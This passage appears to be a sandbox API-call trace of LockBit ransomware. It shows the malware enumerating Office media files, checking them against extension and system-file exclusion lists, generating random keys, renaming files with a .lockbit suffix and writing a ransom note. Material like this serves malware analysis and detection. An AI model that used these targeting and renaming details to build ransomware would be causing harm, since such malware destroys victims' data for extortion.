(_Block=0x1fa2ed8) [0199.342] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0299763.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0199.342] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0199.342] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.342] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0508500, ftCreationTime.dwHighDateTime=0x1bf3a1b, ftLastAccessTime.dwLowDateTime=0xbd68fd60, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xf0508500, ftLastWriteTime.dwHighDateTime=0x1bf3a1b, nFileSizeHigh=0x0, nFileSizeLow=0x3465, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0300520.GIF", cAlternateFileName="")) returned 1 [0199.342] lstrcmpiW (lpString1=".", lpString2="J0300520.GIF") returned -1 [0199.342] lstrcmpiW (lpString1="..", lpString2="J0300520.GIF") returned -1 [0199.342] PathFindExtensionW (pszPath="J0300520.GIF") returned=".GIF" [0199.342] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0199.342] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0199.342] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0199.342] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0199.342] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0199.342] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0199.342] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0199.342] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0199.342] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0199.342] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0199.342] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0199.342] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0199.342] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0199.342] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0199.343] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0199.343] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0199.343] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0199.343] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0199.343] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0199.343] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0199.343] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0199.343] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0199.343] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0199.343] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0199.343] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0199.343] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0199.343] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0199.343] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0199.343] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0199.343] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0199.343] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0199.343] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0199.343] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0199.343] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0199.343] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0199.344] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0199.344] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0199.344] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0199.344] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0199.344] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0199.344] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0199.344] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0199.344] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0199.344] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0199.344] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0199.344] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0199.344] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0199.344] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0300520.GIF") returned 1 [0199.344] lstrcmpiW (lpString1="ntldr", lpString2="J0300520.GIF") returned 1 [0199.344] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0300520.GIF") returned 1 [0199.344] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0300520.GIF") returned -1 [0199.344] lstrcmpiW (lpString1="autorun.inf", lpString2="J0300520.GIF") returned -1 [0199.344] lstrcmpiW (lpString1="thumbs.db", lpString2="J0300520.GIF") returned 1 [0199.344] lstrcmpiW (lpString1="iconcache.db", lpString2="J0300520.GIF") returned -1 [0199.344] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0199.344] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0300520.GIF") returned=".GIF" [0199.344] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0199.344] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0199.344] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0199.344] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0199.344] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0199.344] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0199.344] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0199.344] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0199.344] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0199.344] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0199.345] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0199.345] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0199.345] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0199.345] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0199.345] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0199.345] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0199.345] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0199.345] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0199.345] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0199.345] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0199.345] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0199.345] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0199.345] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0199.345] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0199.345] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0199.345] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0199.345] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0199.345] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0199.345] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0300520.GIF.lockbit") returned 70 [0199.345] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0300520.GIF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0300520.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0199.346] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.346] malloc (_Size=0x40068) returned 0x3df0008 [0199.347] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=13413) returned 1 [0199.347] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.347] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.347] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0199.347] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.347] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.347] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0199.347] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0199.349] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0300520.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0300520.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.349] malloc (_Size=0xa2) returned 0x1fa2ed8 [0199.349] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0199.350] free (_Block=0x1fa2ed8) [0199.351] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0300520.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0199.351] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0199.351] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.351] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9b61300, ftCreationTime.dwHighDateTime=0x1bf452c, ftLastAccessTime.dwLowDateTime=0xbd68fd60, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xf9b61300, ftLastWriteTime.dwHighDateTime=0x1bf452c, nFileSizeHigh=0x0, nFileSizeLow=0x239c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0300840.WMF", cAlternateFileName="")) returned 1 [0199.351] lstrcmpiW (lpString1=".", lpString2="J0300840.WMF") returned -1 [0199.351] lstrcmpiW (lpString1="..", lpString2="J0300840.WMF") returned -1 [0199.351] PathFindExtensionW (pszPath="J0300840.WMF") returned=".WMF" [0199.351] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0199.351] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0199.351] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0199.351] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0199.351] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0199.351] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0199.351] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0199.351] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0199.351] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0199.351] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0199.351] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0199.351] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0199.351] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0199.351] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0199.351] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0199.351] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0199.351] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0199.351] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0199.351] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0199.352] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0199.352] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0199.352] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0199.352] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0199.352] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0199.352] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.352] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0199.352] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0199.352] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0199.352] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0199.352] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0199.352] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0199.352] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0199.352] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0199.352] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0199.352] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0199.352] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0199.352] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0199.352] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0199.352] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0199.352] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0199.352] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0199.352] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0199.352] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.352] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0199.352] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0199.352] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0199.352] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0199.352] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0300840.WMF") returned 1 [0199.352] lstrcmpiW (lpString1="ntldr", lpString2="J0300840.WMF") returned 1 [0199.353] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0300840.WMF") returned 1 [0199.353] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0300840.WMF") returned -1 [0199.353] lstrcmpiW (lpString1="autorun.inf", lpString2="J0300840.WMF") returned -1 [0199.353] lstrcmpiW (lpString1="thumbs.db", lpString2="J0300840.WMF") returned 1 [0199.353] lstrcmpiW (lpString1="iconcache.db", lpString2="J0300840.WMF") returned -1 [0199.353] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0199.353] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0300840.WMF") returned=".WMF" [0199.353] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.353] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.353] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0199.353] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0199.353] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0199.353] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0199.353] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0199.353] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0199.353] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0199.353] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.353] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0199.353] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0199.353] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0199.353] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0199.353] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0199.353] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0199.353] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0199.353] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0199.353] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0199.353] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0199.354] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0199.354] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0199.354] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0199.354] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0199.355] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0199.355] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0199.355] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0199.355] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0199.355] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0300840.WMF.lockbit") returned 70 [0199.355] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0300840.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0300840.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0199.356] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.356] malloc (_Size=0x40068) returned 0x1ff1e60 [0199.356] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=9116) returned 1 [0199.356] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.357] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.357] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0199.357] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.358] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.358] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0199.358] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0199.361] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0300840.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0300840.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.361] malloc (_Size=0xa2) returned 0x1fa2ed8 [0199.361] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0199.363] free (_Block=0x1fa2ed8) [0199.363] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0300840.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0199.363] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0199.363] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.363] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x616c5e00, ftCreationTime.dwHighDateTime=0x1bf452d, ftLastAccessTime.dwLowDateTime=0xbd68fd60, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x616c5e00, ftLastWriteTime.dwHighDateTime=0x1bf452d, nFileSizeHigh=0x0, nFileSizeLow=0xdafc, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0300912.WMF", cAlternateFileName="")) returned 1 [0199.363] lstrcmpiW (lpString1=".", lpString2="J0300912.WMF") returned -1 [0199.363] lstrcmpiW (lpString1="..", lpString2="J0300912.WMF") returned -1 [0199.363] PathFindExtensionW (pszPath="J0300912.WMF") returned=".WMF" [0199.363] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0199.363] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0199.363] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0199.363] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0199.363] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0199.363] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0199.364] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0199.364] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0199.364] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0199.364] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0199.364] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0199.364] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0199.364] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0199.364] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0199.364] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0199.364] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0199.364] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0199.364] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0199.364] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0199.364] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0199.364] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0199.364] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0199.364] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0199.364] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0199.364] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.364] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0199.364] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0199.364] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0199.364] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0199.365] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0199.365] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0199.365] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0199.365] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0199.365] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0199.365] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0199.365] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0199.365] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0199.365] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0199.365] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0199.365] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0199.365] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0199.365] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0199.365] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.365] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0199.365] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0199.365] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0199.365] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0199.365] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0300912.WMF") returned 1 [0199.365] lstrcmpiW (lpString1="ntldr", lpString2="J0300912.WMF") returned 1 [0199.365] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0300912.WMF") returned 1 [0199.365] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0300912.WMF") returned -1 [0199.366] lstrcmpiW (lpString1="autorun.inf", lpString2="J0300912.WMF") returned -1 [0199.366] lstrcmpiW (lpString1="thumbs.db", lpString2="J0300912.WMF") returned 1 [0199.366] lstrcmpiW (lpString1="iconcache.db", lpString2="J0300912.WMF") returned -1 [0199.366] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0199.366] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0300912.WMF") returned=".WMF" [0199.366] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.366] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.366] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0199.366] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0199.366] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0199.366] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0199.366] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0199.366] lstrcmpiW (lpString1=".db-wal", 